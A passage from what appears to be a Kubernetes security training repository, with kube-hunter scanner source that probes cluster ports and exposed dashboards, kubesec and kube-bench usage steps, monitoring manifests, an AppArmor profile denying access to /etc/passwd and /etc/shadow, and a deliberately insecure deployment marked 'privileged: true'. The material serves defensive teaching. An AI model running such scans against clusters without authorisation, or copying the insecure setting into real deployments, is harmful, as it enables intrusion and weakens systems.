| - /etc/kubernetes/manifests/kube-scheduler.manifest 21 | defaultconf: /etc/kubernetes/manifests/kube-scheduler.yaml 22 | 23 | controllermanager: 24 | confs: 25 | - /etc/kubernetes/manifests/kube-controller-manager.yaml 26 | - /etc/kubernetes/manifests/kube-controller-manager.manifest 27 | defaultconf: /etc/kubernetes/manifests/kube-controller-manager.yaml 28 | 29 | etcd: 30 | confs: 31 | - /etc/kubernetes/manifests/etcd.yaml 32 | - /etc/kubernetes/manifests/etcd.manifest 33 | defaultconf: /etc/kubernetes/manifests/etcd.yaml 34 | 35 | node: 36 | kubelet: 37 | confs: 38 | - /etc/systemd/system/kubelet.service.d/10-kubeadm.conf 39 | defaultconf: 
/etc/systemd/system/kubelet.service.d/10-kubeadm.conf 40 | 41 | proxy: 42 | confs: 43 | - /etc/kubernetes/addons/kube-proxy-daemonset.yaml 44 | defaultconf: /etc/kubernetes/addons/kube-proxy-daemonset.yaml 45 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/img/kube-bench-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-1.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/img/kube-bench-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-2.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/img/kube-bench-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-3.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/img/kube-bench-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-4.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/kube-bench: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/kube-bench 
-------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/README.md: -------------------------------------------------------------------------------- 1 | # Scanning K8s Cluster - Kubehunter 2 | 3 | 4 | 5 | ##### Step 1: 6 | 7 | 8 | * Navigate to the `Kube-Hunter` directory that has `kubehunter.py` file. 9 | 10 | ```bash 11 | cd /root/container_training/Kubernetes/Kube-Hunter 12 | ``` 13 | 14 | 15 | ##### Step 2: 16 | 17 | * To get a list of arguments available, run 18 | 19 | ```bash 20 | ./kube-hunter.py --help 21 | ``` 22 | 23 | 24 | ##### Step 3: 25 | 26 | * To get list of all passive and active scans, run the following command 27 | 28 | ```bash 29 | ./kube-hunter.py --active --list 30 | ``` 31 | 32 | 33 | ##### Step 4: 34 | 35 | * Start a passive scan with kube-hunter on the server 36 | 37 | ###### * Note: Server IP can be fetched by running `serverip` on the provisioned server. 38 | 39 | 40 | ```bash 41 | serverip 42 | 43 | ./kube-hunter.py 44 | ``` 45 | 46 | 47 | ##### Step 5: 48 | 49 | * Select `option 1` to run a scan on the kubernetes instance deployed on the server and enter the Server IP 50 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/__init__.py -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/img/kube-hunter-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-1.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/img/kube-hunter-2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-2.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/img/kube-hunter-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-3.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/img/kube-hunter-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-4.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/img/kube-hunter-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-5.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/plugins/README.md: -------------------------------------------------------------------------------- 1 | # Plugins 2 | 3 | This folder contains modules that will load before any parsing of arguments by kubehunter's main module 4 | 5 | An example for using a plugin to add an argument: 6 | ```python 7 | # example.py 8 | from __main__ import parser 9 | 10 | parser.add_argument('--exampleflag', action="store_true", help="enables active hunting") 11 | ``` 12 | What we did here was just add a file to the `plugins/` folder, import the parser, and adding an argument. 
13 | 14 | All plugins in this folder gets imported right after the main arguments are added, and right before they are getting parsed, so you can add an argument that will later be used in your [hunting/discovery module](../src/README.md). 15 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/requirements.txt: -------------------------------------------------------------------------------- 1 | netaddr 2 | netifaces 3 | enum34 4 | scapy 5 | requests 6 | PrettyTable 7 | urllib3 8 | ruamel.yaml 9 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/__init__.py: -------------------------------------------------------------------------------- 1 | import core 2 | import modules -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/core/__init__.py: -------------------------------------------------------------------------------- 1 | import types 2 | import events -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/core/events/__init__.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | import types -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/core/events/types/__init__.py: 
-------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | from common import * 5 | 6 | # dynamically importing all modules in folder 7 | files = glob.glob(dirname(__file__)+"/*.py") 8 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 9 | if module_name != "handler": 10 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/core/types.py: -------------------------------------------------------------------------------- 1 | class ActiveHunter(object): 2 | def publish_event(self, event): 3 | handler.publish_event(event, caller=self) 4 | 5 | 6 | class Hunter(object): 7 | def publish_event(self, event): 8 | handler.publish_event(event, caller=self) 9 | 10 | 11 | """Kubernetes Components""" 12 | class KubernetesCluster(): 13 | """Kubernetes Cluster""" 14 | name = "Kubernetes Cluster" 15 | 16 | class Kubelet(KubernetesCluster): 17 | """The kubelet is the primary "node agent" that runs on each node""" 18 | name = "Kubelet" 19 | 20 | 21 | """ Categories """ 22 | class InformationDisclosure(object): 23 | name = "Information Disclosure" 24 | 25 | class RemoteCodeExec(object): 26 | name = "Remote Code Execution" 27 | 28 | class IdentityTheft(object): 29 | name = "Identity Theft" 30 | 31 | class UnauthenticatedAccess(object): 32 | name = "Unauthenticated Access" 33 | 34 | class AccessRisk(object): 35 | name = "Access Risk" 36 | 37 | 38 | from events import handler # import is in the bottom to break import loops -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/__init__.py: -------------------------------------------------------------------------------- 1 | import report 2 | import discovery 3 | import hunting 
-------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/discovery/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/discovery/apiserver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | from ...core.types import Hunter 4 | from ...core.events import handler 5 | from ...core.events.types import OpenPortEvent, Service, Event 6 | 7 | class ReadOnlyKubeletEvent(Service, Event): 8 | """The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets""" 9 | def __init__(self): 10 | Service.__init__(self, name="Kubelet API (readonly)") 11 | 12 | 13 | class ApiServer(Service, Event): 14 | """The API server is in charge of all operations on the cluster.""" 15 | def __init__(self): 16 | Service.__init__(self, name="API Server") 17 | 18 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 443 or x.port == 6443) 19 | class ApiServerDiscovery(Hunter): 20 | """Api Server Discovery 21 | Checks for the existence of a an Api Server 22 | """ 23 | def __init__(self, event): 24 | self.event = event 25 | 26 | def execute(self): 27 | main_request = requests.get("https://{}:{}".format(self.event.host, self.event.port), verify=False).text 28 | if "code" in main_request: 29 | self.event.role = "Master" 30 | self.publish_event(ApiServer()) 31 | -------------------------------------------------------------------------------- 
/Kubernetes/Kube-Hunter/src/modules/discovery/dashboard.py: -------------------------------------------------------------------------------- 1 | import json 2 | 3 | import requests 4 | 5 | from ...core.events import handler 6 | from ...core.events.types import Event, OpenPortEvent, Service 7 | from ...core.types import Hunter 8 | 9 | 10 | class KubeDashboardEvent(Service, Event): 11 | """A web-based Kubernetes user interface. allows easy usage with operations on the cluster""" 12 | def __init__(self, **kargs): 13 | Service.__init__(self, name="Kubernetes Dashboard", **kargs) 14 | 15 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000) 16 | class KubeDashboard(Hunter): 17 | """K8s Dashboard Discovery 18 | Checks for the existence of a Dashboard 19 | """ 20 | def __init__(self, event): 21 | self.event = event 22 | 23 | @property 24 | def secure(self): 25 | r = requests.get("http://{}:{}/api/v1/service/default".format(self.event.host, self.event.port)) 26 | if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0: 27 | return False 28 | return True 29 | 30 | def execute(self): 31 | if not self.secure: 32 | self.publish_event(KubeDashboardEvent()) 33 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/discovery/ports.py: -------------------------------------------------------------------------------- 1 | import logging 2 | 3 | from socket import socket 4 | from ...core.types import Hunter 5 | 6 | from ...core.events import handler 7 | from ...core.events.types import NewHostEvent, OpenPortEvent 8 | 9 | 10 | default_ports = [8001, 10250, 10255, 30000, 443, 6443] 11 | 12 | @handler.subscribe(NewHostEvent) 13 | class PortDiscovery(Hunter): 14 | """Port Scanning 15 | Scans Kubernetes known ports to determine open endpoints for discovery 16 | """ 17 | def __init__(self, event): 18 | self.event = event 19 | self.host = event.host 20 | self.port = event.port 21 | 22 | def 
execute(self): 23 | logging.debug("host {0} try ports {1}".format(self.host, default_ports)) 24 | for single_port in default_ports: 25 | if self.test_connection(self.host, single_port): 26 | self.publish_event(OpenPortEvent(port=single_port)) 27 | 28 | @staticmethod 29 | def test_connection(host, port): 30 | s = socket() 31 | s.settimeout(1.5) 32 | try: 33 | success = s.connect_ex((str(host), port)) 34 | if success == 0: 35 | return True 36 | except: pass 37 | finally: s.close() 38 | return False 39 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/discovery/proxy.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from ...core.types import Hunter 3 | 4 | from ...core.events import handler 5 | from ...core.events.types import Service, Event, OpenPortEvent 6 | 7 | class KubeProxyEvent(Event, Service): 8 | """proxies from a localhost address to the Kubernetes apiserver""" 9 | def __init__(self): 10 | Service.__init__(self, name="Kubernetes Proxy") 11 | 12 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001) 13 | class KubeProxy(Hunter): 14 | """Proxy Discovery 15 | Checks for the existence of a an open Proxy service 16 | """ 17 | def __init__(self, event): 18 | self.event = event 19 | self.host = event.host 20 | self.port = event.port or 8001 21 | 22 | @property 23 | def accesible(self): 24 | r = requests.get("http://{host}:{port}/api/v1".format(host=self.host, port=self.port)) 25 | if r.status_code == 200 and "APIResourceList" in r.text: 26 | return True 27 | 28 | def execute(self): 29 | if self.accesible: 30 | self.publish_event(KubeProxyEvent()) 31 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/hunting/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | 
import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/hunting/certificates.py: -------------------------------------------------------------------------------- 1 | from ...core.types import Hunter, KubernetesCluster, InformationDisclosure 2 | from ...core.events import handler 3 | from ...core.events.types import Vulnerability, Event, Service 4 | 5 | import ssl 6 | import base64 7 | import re 8 | 9 | email_pattern = re.compile(r"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)") 10 | 11 | class CertificateEmail(Vulnerability, Event): 12 | """Certificate includes an email address""" 13 | def __init__(self, email): 14 | Vulnerability.__init__(self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure) 15 | self.email = email 16 | self.evidence = "email: {}".format(self.email) 17 | 18 | @handler.subscribe(Service) 19 | class CertificateDiscovery(Hunter): 20 | """Certificate Email Hunting 21 | Checks for email addresses in kuberntes ssl certificates 22 | """ 23 | def __init__(self, event): 24 | self.event = event 25 | 26 | def execute(self): 27 | try: 28 | addr = (str(self.event.host), self.event.port) 29 | cert = ssl.get_server_certificate(addr) 30 | except ssl.SSLError as e: 31 | # If the server doesn't offer SSL on this port we won't get a certificate 32 | return 33 | c = cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER) 34 | certdata = base64.decodestring(c) 35 | emails = re.findall(email_pattern, certdata) 36 | for email in emails: 37 | self.publish_event( CertificateEmail(email=email) ) -------------------------------------------------------------------------------- 
/Kubernetes/Kube-Hunter/src/modules/hunting/dashboard.py: -------------------------------------------------------------------------------- 1 | import json 2 | from ...core.types import Hunter, RemoteCodeExec, KubernetesCluster 3 | 4 | import requests 5 | 6 | from ...core.events import handler 7 | from ...core.events.types import Vulnerability, Event 8 | from ..discovery.dashboard import KubeDashboardEvent 9 | 10 | class DashboardExposed(Vulnerability, Event): 11 | """All oprations on the cluster are exposed""" 12 | def __init__(self, nodes): 13 | Vulnerability.__init__(self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec) 14 | self.evidence = "nodes: {}".format(' '.join(nodes)) if nodes else None 15 | 16 | @handler.subscribe(KubeDashboardEvent) 17 | class KubeDashboard(Hunter): 18 | """Dashboard Hunting 19 | Hunts open Dashboards, gets the type of nodes in the cluster 20 | """ 21 | def __init__(self, event): 22 | self.event = event 23 | 24 | def get_nodes(self): 25 | r = requests.get("http://{}:{}/api/v1/node".format(self.event.host, self.event.port)) 26 | if r.status_code == 200 and "nodes" in r.text: 27 | return list(map(lambda node: node["objectMeta"]["name"], json.loads(r.text)["nodes"])) 28 | 29 | def execute(self): 30 | self.publish_event(DashboardExposed(nodes=self.get_nodes())) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/report/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/Kube-Hunter/src/modules/report/yaml.py: 
-------------------------------------------------------------------------------- 1 | import StringIO 2 | 3 | from ruamel.yaml import YAML 4 | 5 | from collector import services, vulnerabilities 6 | 7 | 8 | class YAMLReporter(object): 9 | def get_report(self): 10 | yaml = YAML() 11 | report = { 12 | "nodes": self.get_nodes(), 13 | "services": self.get_services(), 14 | "vulnerabilities": self.get_vulenrabilities() 15 | } 16 | output = StringIO.StringIO() 17 | yaml.dump(report, output) 18 | return output.getvalue() 19 | 20 | def get_nodes(self): 21 | nodes = list() 22 | node_locations = set() 23 | for service in services: 24 | node_location = str(service.host) 25 | if node_location not in node_locations: 26 | nodes.append({"type": "Node/Master", "location": str(service.host)}) 27 | node_locations.add(node_location) 28 | return nodes 29 | 30 | def get_services(self): 31 | return [{"service": service.get_name(), 32 | "location": "{}:{}{}".format(service.host, service.port, service.get_path()), 33 | "description": service.explain()} 34 | for service in services] 35 | 36 | def get_vulenrabilities(self): 37 | return [{"location": "{}:{}".format(vuln.host, vuln.port) if vuln.host else "", 38 | "category": vuln.category.name, 39 | "vulnerability": vuln.get_name(), 40 | "description": vuln.explain(), 41 | "evidence": str(vuln.evidence)} 42 | for vuln in vulnerabilities] 43 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Sec/README.md: -------------------------------------------------------------------------------- 1 | # YAML Static Analyser - Kubesec 2 | 3 | ###### Kubesec helps quantify risk for K8s resources based on the suggested best-practices. Lists of test run can be found at https://kubesec.io/basics/. 
4 | 5 | 6 | ##### Step 1: 7 | 8 | * Navigate to the `Kube-Sec` directory 9 | 10 | ```bash 11 | cd /root/container_training/Kubernetes/Kube-Sec 12 | ``` 13 | 14 | 15 | ##### Step 2: 16 | 17 | * To analyze a Kubernetes YAML spec file, run 18 | 19 | ```bash 20 | ./kubesec insecure_vulflask_deployment.yaml 21 | ``` 22 | 23 | 24 | ##### Step 3: 25 | 26 | * To save results to a file, run the following command 27 | 28 | ```bash 29 | ./kubesec insecure_vulflask_deployment.yaml >> kubesec_result.json 30 | ``` 31 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Sec/img/kube-sec-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Sec/img/kube-sec-1.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Sec/img/kube-sec-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Sec/img/kube-sec-2.png -------------------------------------------------------------------------------- /Kubernetes/Kube-Sec/insecure_vulflask_deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: vul-flask 5 | spec: 6 | replicas: 2 7 | minReadySeconds: 15 8 | strategy: 9 | type: RollingUpdate 10 | rollingUpdate: 11 | maxUnavailable: 1 12 | maxSurge: 1 13 | template: 14 | metadata: 15 | labels: 16 | app: vul-flask 17 | spec: 18 | containers: 19 | - image: abhaybhargav/vul_flask 20 | imagePullPolicy: Always 21 | name: vul-flask 22 | ports: 23 | - containerPort: 5050 24 | securityContext: 25 | # the privileged flag will be marked as a critical risk 26 | privileged: true 27 | readOnlyRootFilesystem: 
true 28 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Sec/kubesec: -------------------------------------------------------------------------------- 1 | FILE="${1:-}"; 2 | [[ ! -f "${FILE}" ]] && { 3 | echo "kubesec: ${FILE}: No such file. Please Check file path" >&2; 4 | }; 5 | curl --silent --compressed --connect-timeout 5 -F file=@"${FILE}" https://kubesec.io/ 6 | -------------------------------------------------------------------------------- /Kubernetes/KubeAudit/insecure_vulflask_deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: vul-flask 5 | spec: 6 | replicas: 2 7 | minReadySeconds: 15 8 | strategy: 9 | type: RollingUpdate 10 | rollingUpdate: 11 | maxUnavailable: 1 12 | maxSurge: 1 13 | template: 14 | metadata: 15 | labels: 16 | app: vul-flask 17 | spec: 18 | containers: 19 | - image: abhaybhargav/vul_flask 20 | imagePullPolicy: Always 21 | name: vul-flask 22 | ports: 23 | - containerPort: 5050 24 | securityContext: 25 | # the privileged flag will be marked as a critical risk 26 | privileged: true 27 | readOnlyRootFilesystem: true 28 | -------------------------------------------------------------------------------- /Kubernetes/PodSecurityPolicy/k8s-vul-flask-redis-armor: -------------------------------------------------------------------------------- 1 | #include 2 | profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) { 3 | #include 4 | file, 5 | network, 6 | capability, 7 | deny /app/** w, #deny file write to /app directory 8 | deny /tmp/** w, #deny file write to /tmp directory 9 | deny /etc/passwd rwklx, #deny all access to /etc/passwd 10 | deny /etc/shadow rwklx, #deny all access to /etc/shadow 11 | 12 | #restrict access to HOME 13 | 14 | audit deny @{HOME}/.* mrwkl, 15 | audit deny @{HOME}/.*/ rw, 16 | audit deny @{HOME}/.*/** mrwkl, 17 | audit deny 
@{HOME}/bin/ rw, 18 | audit deny @{HOME}/bin/** mrwkl, 19 | # @{HOME}/ r, 20 | # @{HOME}/** rw, 21 | } 22 | -------------------------------------------------------------------------------- /Kubernetes/PodSecurityPolicy/reverseproxy.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | 5 | location / { 6 | proxy_bind 127.0.0.1; 7 | proxy_pass http://127.0.0.1:5000; 8 | } 9 | 10 | error_page 500 502 503 504 /50x.html; 11 | location = /50x.html { 12 | root /usr/share/nginx/html; 13 | } 14 | } -------------------------------------------------------------------------------- /Kubernetes/PodSecurityPolicy/secure-ngflask-deploy.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: secure-ngflask-redis 5 | annotations: 6 | seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default' 7 | container.apparmor.security.beta.kubernetes.io/secure-vul-flask: 'localhost/k8s-vul-flask-redis-armor' 8 | labels: 9 | app: secure-ngflask-redis 10 | spec: 11 | containers: 12 | - name: nginx 13 | image: nginx:1.11 14 | ports: 15 | - containerPort: 80 16 | volumeMounts: 17 | - mountPath: /etc/nginx/conf.d 18 | name: config-volume 19 | - name: redis 20 | image: redis 21 | ports: 22 | - containerPort: 6379 23 | - name: secure-vul-flask 24 | image: abhaybhargav/secure_vul_flask 25 | imagePullPolicy: Always 26 | securityContext: 27 | runAsUser: 100 28 | runAsNonRoot: true 29 | allowPrivilegeEscalation: false 30 | env: 31 | - name: REDIS_HOST 32 | value: 127.0.0.1 33 | ports: 34 | - containerPort: 5000 35 | name: vulflask-port 36 | volumes: 37 | - name: config-volume 38 | configMap: 39 | name: nginx-config -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/clusterRole.yaml: 
-------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1beta1 2 | kind: ClusterRole 3 | metadata: 4 | name: prometheus 5 | rules: 6 | - apiGroups: [""] 7 | resources: 8 | - nodes 9 | - nodes/proxy 10 | - services 11 | - endpoints 12 | - pods 13 | verbs: ["get", "list", "watch"] 14 | - apiGroups: 15 | - extensions 16 | resources: 17 | - ingresses 18 | verbs: ["get", "list", "watch"] 19 | - nonResourceURLs: ["/metrics"] 20 | verbs: ["get"] 21 | --- 22 | apiVersion: rbac.authorization.k8s.io/v1beta1 23 | kind: ClusterRoleBinding 24 | metadata: 25 | name: prometheus 26 | roleRef: 27 | apiGroup: rbac.authorization.k8s.io 28 | kind: ClusterRole 29 | name: prometheus 30 | subjects: 31 | - kind: ServiceAccount 32 | name: default 33 | namespace: monitoring 34 | -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/grafana-prometheus.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: grafana 5 | namespace: monitoring 6 | spec: 7 | type: NodePort 8 | ports: 9 | - port: 3000 10 | protocol: TCP 11 | targetPort: 3000 12 | selector: 13 | app: grafana 14 | --- 15 | apiVersion: extensions/v1beta1 16 | kind: Deployment 17 | metadata: 18 | labels: 19 | name: grafana 20 | name: grafana 21 | namespace: monitoring 22 | spec: 23 | replicas: 1 24 | selector: 25 | matchLabels: 26 | name: grafana 27 | strategy: 28 | rollingUpdate: 29 | maxSurge: 1 30 | maxUnavailable: 1 31 | type: RollingUpdate 32 | template: 33 | metadata: 34 | creationTimestamp: null 35 | labels: 36 | name: grafana 37 | app: grafana 38 | spec: 39 | containers: 40 | - image: grafana/grafana:latest 41 | imagePullPolicy: IfNotPresent 42 | name: grafana 43 | ports: 44 | - containerPort: 3000 45 | protocol: TCP 46 | volumeMounts: 47 | - mountPath: /var/lib/grafana 48 | name: data 49 | restartPolicy: Always 
50 | volumes: 51 | - emptyDir: {} 52 | name: data 53 | -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-1.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-10.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-11.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-12.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-13.png 
-------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-2.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-3.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-4.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-5.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-6.png -------------------------------------------------------------------------------- 
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-7.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-8.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/img/prometheus-grafana-9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-9.png -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/prometheus.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: prometheus-service 5 | namespace: monitoring 6 | annotations: 7 | prometheus.io/scrape: 'true' 8 | prometheus.io/path: / 9 | prometheus.io/port: '8080' 10 | 11 | spec: 12 | selector: 13 | app: prometheus-server 14 | type: NodePort 15 | ports: 16 | - port: 8080 17 | targetPort: 9090 18 | nodePort: 31000 19 | --- 20 | apiVersion: extensions/v1beta1 21 | kind: Deployment 22 | metadata: 23 | name: prometheus-deployment 24 | namespace: monitoring 25 | spec: 26 | replicas: 1 27 | template: 28 | metadata: 